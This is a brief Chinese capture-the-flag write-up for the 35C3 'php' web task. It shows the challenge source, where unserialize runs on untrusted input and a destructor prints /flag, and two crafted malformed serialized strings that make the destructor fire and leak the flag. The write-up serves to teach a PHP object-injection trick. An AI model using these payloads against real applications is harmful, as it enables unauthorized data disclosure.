35C3 CTF - Web - php

参考链接

https://ctftime.org/task/7404

题目描述

PHP's unserialization mechanism can be exceptional.

解题流程

程序代码

<?php
$line = trim(fgets(STDIN));
$flag = file_get_contents('/flag');

class B {
  function __destruct() {
    global $flag;
    echo $flag;
  }
}

$a = @unserialize($line);
throw new Exception('Well that was unexpected…');
echo $a;

           

我们用以下代码产生一个正常的序列：

class B {
	
}

$a = array(1,2,new B(),3,4);
echo serialize($a);
           

用以上代码构造序列化数组：

a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4;}

，把最后面的分号去掉变成

a:5:{i:0;i:1;i:1;i:2;i:2;O:1:"B":0:{}i:3;i:3;i:4;i:4}

，将该序列发送给php程序即可显示flag。

<?php

$test = new B();
$serialize_test = serialize($test);
echo $serialize_test;
           

上述代码会产生序列：

O:1:"B":0:{}

，把0改成1，序列变为

O:1:"B":1:{}

，把这个序列发送给php程序也能获得flag。